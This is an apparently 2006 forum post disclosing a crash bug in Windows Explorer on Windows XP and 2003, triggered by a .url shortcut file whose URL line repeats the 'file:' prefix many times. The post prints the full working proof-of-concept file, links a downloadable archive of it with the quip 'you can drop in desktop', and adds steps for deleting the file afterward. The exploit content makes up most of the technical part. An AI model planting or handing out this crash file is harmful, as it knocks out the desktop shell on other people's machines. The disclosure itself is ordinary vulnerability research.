HomeWindows Explorer URL File format overflow

Windows Explorer URL File format overflow

Ju, 06/07/2006 - 14:16 — OeX
Windows Explorer URL File format overflow

Affected Vendor:

Microsoft

Affected Products:

WindowsXP ALL

Windows2003 ALL

Vulnerability Details:

When explorer.exe parsing *.url file which contains a url as follows format will cause explorer.exe crash.

if you create the Exploit.url on Desktop

Explorer will Crash...Crash...Crash...Crash...Crash...Crash...

if you will del exploit.url

open taskmgr.exe

open cmd.exe

then cd your desktop

del exploit.url

Exploit:

[InternetShortcut]

url=file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:

Attachment:

http://hitcon.org/Nanika-desktop_explore_0day.rar

you can drop in desktop :P

http://hitcon.org
http://www.chroot.org
  • 465 lecturas

Responder

  • Saltos automáticos de líneas y de párrafos.
  • Allowed HTML tags: <a> <em> <strong> <cite> <code> <ul> <ol> <li> <dl> <dt> <dd> <img> <p> <br>
  • You may post code using <code>...</code> (generic) or <?php ... ?> (highlighted PHP) tags.

Más información sobre opciones de formato

CAPTCHA
This question is for testing whether you are a human visitor and to prevent automated spam submissions.
Image CAPTCHA
Copy the characters (respecting upper/lower case) from the image.